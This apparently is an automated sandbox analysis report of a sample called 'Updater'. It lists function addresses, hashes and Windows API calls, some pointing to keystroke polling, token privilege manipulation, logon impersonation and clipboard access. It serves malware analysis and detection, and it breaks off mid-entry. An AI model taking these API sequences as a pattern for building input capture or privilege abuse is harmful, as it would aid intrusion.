Opcode Fuzzy Hash: df02180e726bdde9caae61b66103b4054116374e854da840bfb197a10209e4fd
Instruction Fuzzy Hash: 63112336640205ABDB24BF24CC02BAD77E4DF40710F3084AEF942A71C2EE709E059B60

Function 0140430D Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 01404386

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: 9996e9769e45e74bdcabb9258bbdbd09714d6ff46f869f59518d5b63c0d4a482
Instruction ID: e0068ccbd7ad3d448e81646a4fd5e515a14149b2dc82cdfc66a69a29369f861e
Opcode Fuzzy Hash: 9996e9769e45e74bdcabb9258bbdbd09714d6ff46f869f59518d5b63c0d4a482
Instruction Fuzzy Hash: E711EFB4A04209AFCB05DF9AD8818AEBBB8FB48714B55946AE914A7350D734AE11CB90

Function 00B58232 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00B58270

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 68dc45ef3a98d18dbdefb7ed7f86b59e883557549a6cbb3c56a76be62ad2f85a
Instruction ID: 2f4ba7efb7eb6761e573a0f05aa3331b2962e1004d174e2d8d1016c73ba83140
Opcode Fuzzy Hash: 68dc45ef3a98d18dbdefb7ed7f86b59e883557549a6cbb3c56a76be62ad2f85a
Instruction Fuzzy Hash: 5C111875A0420AAFCB15DF58E941A9A7BF4EF48311F104499FC09AB311DA31EA25CBA5

Function 00B4E4A2 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2009a02d5f339f5257c59c963c83ace43b5680a0de814ef047c30addbb01e52
Instruction ID: 70be5719e4149f357a08247dde23c4bfe53615182a522210ead0f2568b9350ec
Opcode Fuzzy Hash: b2009a02d5f339f5257c59c963c83ace43b5680a0de814ef047c30addbb01e52
Instruction Fuzzy Hash: 35F028329016105AD6313B29DC05B5B33D8AF52335F100BD5FD34972D2EF70EE09A6A1

Function 00B5282E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00B40445,?,?,00B2FA72,00000000,?,?,?,00B21188,?), ref: 00B52860

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 656be4e960a0881dfa5af732de594eb24f9b0380b06925f2a1270691e57e67ef
Instruction ID: 9924d59ad97b2d7975327407c14e2d6754b58d91b257ce476a025a6c2eb332c9
Opcode Fuzzy Hash: 656be4e960a0881dfa5af732de594eb24f9b0380b06925f2a1270691e57e67ef
Instruction Fuzzy Hash: 44E0ED3224262167EA2137EA9C04B6B3AC8EF033A2F1901F0BC01A31A1EB60DD0681E0

Function 013F3489 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

LoadStringA.USER32(00000000,00010000,?,00001000), ref: 013F34BB

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 98cb9e290b6fcda0473899373f779afeb580b28c0de553bc535e0dfee71ead7e
Instruction ID: 74d9f7cbb2d12772aa4f1c3dabebcb4765087790ce8fff30d5a5a1bc475f0895
Opcode Fuzzy Hash: 98cb9e290b6fcda0473899373f779afeb580b28c0de553bc535e0dfee71ead7e
Instruction Fuzzy Hash: 5CF0A075300611DBCB01DA9CDCC0F5636DC5B08288B048069B74CDB348EB60CC4487A2

Function 00B3283A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d86ecfe8ec7a6260f81e3f30b4e6d507c82ac73b91558118a3ab2c75f158dd15
Instruction ID: 270e8db0f398a18ea7c5d081621039128a3ba4099762f23125590e5586816550
Opcode Fuzzy Hash: d86ecfe8ec7a6260f81e3f30b4e6d507c82ac73b91558118a3ab2c75f158dd15
Instruction Fuzzy Hash: 5CF03071545701CFCB349F65D494816B7E5FF1432932089BEE1DA83510D7359840DF90

Function 00B54BA6 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B54BC8

Part of subcall function 00B527F4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B2FC79,?,?,00B2111E), ref: 00B5280A

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: FreeHeap_free
String ID:
API String ID: 3249267023-0
Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction ID: 188b0cb000d64494a5201dc179e195a1b31c9ac55b72e3fcdb7dfadb1a65ccf0
Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction Fuzzy Hash: 25E0923A1053059F8720CF6CE500B82B7E4EF893657208569ED9DD3210D731F856CB80

Function 00B65FA4 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00B65FAF

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 811c93b133af9f420f8247a613b49f28192e18d034e385fcfb6815f4dd148bb1
Instruction ID: 094d2b3f38b91bf06da200ada5503580c585965656b8f2cb2038c87732e6596b
Opcode Fuzzy Hash: 811c93b133af9f420f8247a613b49f28192e18d034e385fcfb6815f4dd148bb1
Instruction Fuzzy Hash: 07F022717582865AEB309BA4EC84B32FBD4EB00311F1005FADAD9826C1EBBD54A0B761

Function 00B328AC Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00B328CA

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 5aa6600b3c90dabe8e751dc9537f39b12223877b02cec01d2e468d945b000684
Instruction ID: 19729ca66167fcb33f7f9b1ff0dd9c130949bdd0d470e0eceb7e3bd6d1ba7764
Opcode Fuzzy Hash: 5aa6600b3c90dabe8e751dc9537f39b12223877b02cec01d2e468d945b000684
Instruction Fuzzy Hash: 15F0DA7140420DFBDF05CF94C941AAA7BA9FB14314F208589F9144A112D732DA61AB91

Function 013F2929 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00B20000,?,00000105), ref: 013F2947

Part of subcall function 013F2BBD: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 013F2BD8
Part of subcall function 013F2BBD: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 013F2BF6
Part of subcall function 013F2BBD: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 013F2C14
Part of subcall function 013F2BBD: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 013F2C32
Part of subcall function 013F2BBD: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,013F2CC1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 013F2C7B
Part of subcall function 013F2BBD: RegQueryValueExA.ADVAPI32(?,013F2E3D,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,013F2CC1,?,80000001), ref: 013F2C99
Part of subcall function 013F2BBD: RegCloseKey.ADVAPI32(?,013F2CC8,00000000,00000000,00000005,00000000,013F2CC1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 013F2CBB

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 4f6f7f1076de1bd117e32dae873e78de734a710e1bc72a608b831ebaeac8ce49
Instruction ID: d2a97f832bd86ccd84e9cf8aec043da2cff00d6a0ea38fe08a96440e9c466182
Opcode Fuzzy Hash: 4f6f7f1076de1bd117e32dae873e78de734a710e1bc72a608b831ebaeac8ce49
Instruction Fuzzy Hash: BFE06D71A00314CBCB54DE9CD8C0A5337D8AB08758F0049A5AE94DF346D370D92087D0

Function 00B3FDB9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B3FDD8

Part of subcall function 00B2F82C: _wcslen.LIBCMT ref: 00B2F83F

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 4ea262d60858196cf455d54377044f72f979151aee495314b1f3ff23ef4442b7
Instruction ID: 10ff30c21bc221ee91e0a90c43d97bb0b8a1832f7de96910416d19803b3e1f92
Opcode Fuzzy Hash: 4ea262d60858196cf455d54377044f72f979151aee495314b1f3ff23ef4442b7
Instruction Fuzzy Hash: 87E086369002285BC72096989C05FFAB7EDDB897A0F0401F6FD0CD7208D9A5AC808691

Function 00B33AA8 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00B33AA9

Part of subcall function 00B34E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 00B34E6B

Part of subcall function 00B34B74: GetCursorPos.USER32(?), ref: 00B34B88
Part of subcall function 00B34B74: ScreenToClient.USER32(00000000,?), ref: 00B34BA5
Part of subcall function 00B34B74: GetAsyncKeyState.USER32(00000001), ref: 00B34BCE
Part of subcall function 00B34B74: GetAsyncKeyState.USER32(00000002), ref: 00B34BE8

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: AsyncStateWindow$ClientCursorForegroundLongScreen
String ID:
API String ID: 4074248120-0
Opcode ID: 270f118a6064455026b0235452b1d81090926199dbef6fb586c6c33961895c69
Instruction ID: d8b1709cab0c45c18a790faebfa50a6eb4bc406b5cd10e39c352e4c45d65b873
Opcode Fuzzy Hash: 270f118a6064455026b0235452b1d81090926199dbef6fb586c6c33961895c69
Instruction Fuzzy Hash: 83D0A7313001244FC614AB189805E6E37D1FF45B30F2403D0F0558B2F5CF609D56C6C1

Function 013F512D Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,01406D2F,00000000,0140913F,014092E5,?,c:\,014092E5,?,c:\), ref: 013F5138

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4572904268e265fd193fcb2e56680a69fd8facc4a158caf36c05ddde75ad2af6
Instruction ID: 1830a9555ab35704dced587d2ec158adc90ce6822c1c36e85ef60dfbeec0a652
Opcode Fuzzy Hash: 4572904268e265fd193fcb2e56680a69fd8facc4a158caf36c05ddde75ad2af6
Instruction Fuzzy Hash: 67C08CA03022040AEE5061BC1CC0A8A028C4B2A03E7212B29E339D21D2E211A4122010

Function 00B602C4 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00B6062E,?,?,00000000,?,00B6062E,00000000,0000000C), ref: 00B602E1

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 399b7d36451a83f1aefd7ae95232fc3fa85b959f8dfd4aefae62d5f357b85933
Instruction ID: 2c895ee7575f00b4730124763bf5b8db2db6c623b549d7605becbb0f7c6356e4
Opcode Fuzzy Hash: 399b7d36451a83f1aefd7ae95232fc3fa85b959f8dfd4aefae62d5f357b85933
Instruction Fuzzy Hash: C3D06C3200010DBBDF028F84DD06EDA3BAAFB48714F014100BE1866020C776E821AB90

Function 013F5445 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,01406D3A,00000000,0140913F,014092E5,?,c:\,014092E5,?,c:\), ref: 013F5452

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 2afb928ea0769a03e65cdb2334b4541331df32d5787a6e4dcd60dacd8e68de1d
Instruction ID: 37719a497d4d11c5f99a50642e96aef78c37ddbceef4e9cfc8ab298971a6b835
Opcode Fuzzy Hash: 2afb928ea0769a03e65cdb2334b4541331df32d5787a6e4dcd60dacd8e68de1d
Instruction Fuzzy Hash: 16B092927502419AEA0035BC1CC1F2A008CE72480AF100879F202D6542E56AC8080020

Function 00B97EFB Relevance: 1.5, APIs: 1, Instructions: 222COMMON

Download Yara Rule

APIs

Part of subcall function 00B31EE8: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00B2C025,?,00008000), ref: 00B31F16

GetLastError.KERNEL32(00000002,00000000), ref: 00B98195

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: f119513cad27b36b32c8fe34c8c35ab18bacfea69501214a52b3e3fb4a2b29a8
Instruction ID: 612960bfe0218d483d778d20803e2e85405815657cc76bc2bdff272ae82931c9
Opcode Fuzzy Hash: f119513cad27b36b32c8fe34c8c35ab18bacfea69501214a52b3e3fb4a2b29a8
Instruction Fuzzy Hash: 9C919E302043119FCB14EF28D491B6AB7E1EF89710F0449ADF99A5B2A2DF34ED49CB56

Function 013EEE49 Relevance: 1.3, APIs: 1, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 013EEEE2

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e87a6391b5a567c042f06bb06dd2041547d4497a5e35fe8e29fe9b093c0e9a99
Instruction ID: b268e17e9fbefafaac1ceff79dadd1a1bc632c5488e10f601142b6fe284be19f
Opcode Fuzzy Hash: e87a6391b5a567c042f06bb06dd2041547d4497a5e35fe8e29fe9b093c0e9a99
Instruction Fuzzy Hash: 5A21FCB4204356DFC760CF2CC884A5ABBE0FF88354B148969F999CB384E330E944CB92

Function 013EEF09 Relevance: 1.3, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,?,00004000), ref: 013EEF99

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 96274f65c4a527f4e37b87508b40ab3519f41951c2593a7b05e565cb7d8d1ec1
Instruction ID: fdc28c3305c88b98436ad7c9dae530d657d25f81a97dc8a79a6488d04d6c1c82
Opcode Fuzzy Hash: 96274f65c4a527f4e37b87508b40ab3519f41951c2593a7b05e565cb7d8d1ec1
Instruction Fuzzy Hash: E421DDB4205312CFC711CF2CD884A1ABBE0FF89354B254968E598DB394D330E919CB92

Function 01415751 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2227830347.0000000001410000.00000040.00000020.00020000.00000000.sdmp, Offset: 01410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_1410000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
Instruction ID: b9b7e0ac57903aa09441c377eb4a7de827390e0d70b3229a9234fb1a592af173
Opcode Fuzzy Hash: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
Instruction Fuzzy Hash: 09313931504A02EAEB214AAEDC40BE77B58BF87324F08072BED619F6E5D730D565C7A1

Non-executed Functions

Function 00BB525A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 576windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00BB5969

Strings

%d/%02d/%02d, xrefs: 00BB5699

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: fcb128c0c30b07565fabc2415449265a2ea6d4012c95dbcd15fd071356735bbc
Instruction ID: beead6ac23ffd41286874ca498a6b429069d7550ba315b28d534c7cee017d07b
Opcode Fuzzy Hash: fcb128c0c30b07565fabc2415449265a2ea6d4012c95dbcd15fd071356735bbc
Instruction Fuzzy Hash: 4412CE71600614ABEB358F29CC49BFE7BF8EF45710F10429AF95A9B2D0EBB49941CB11

Function 00B8230F Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00B827D9: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B82823
Part of subcall function 00B827D9: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B82850
Part of subcall function 00B827D9: GetLastError.KERNEL32 ref: 00B82860

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00B82394
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00B823B6
CloseHandle.KERNEL32(?), ref: 00B823C7
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B823DF
GetProcessWindowStation.USER32 ref: 00B823F8
SetProcessWindowStation.USER32(00000000), ref: 00B82402
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B8241E

Part of subcall function 00B821C9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B82308), ref: 00B821DE
Part of subcall function 00B821C9: CloseHandle.KERNEL32(?,?,00B82308), ref: 00B821F3

Strings

default, xrefs: 00B82419
winsta0, xrefs: 00B823DA
, xrefs: 00B82368

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 0d931b0d0c2db61b57938b001b76fff05b4dc35d297bac61d97c2501b7e043f8
Instruction ID: 081f0e5f3cf8c6eee72ed25e80087b3e996d3a7517a859b0ac48717008ef9ebd
Opcode Fuzzy Hash: 0d931b0d0c2db61b57938b001b76fff05b4dc35d297bac61d97c2501b7e043f8
Instruction Fuzzy Hash: 16818CB1940209AFDF11AFA4DD49FEE7BF8EF08300F1441A9F915A62A0DB75CA45CB60

Function 00B9F664 Relevance: 30.2, APIs: 20, Instructions: 189clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00B9F68E
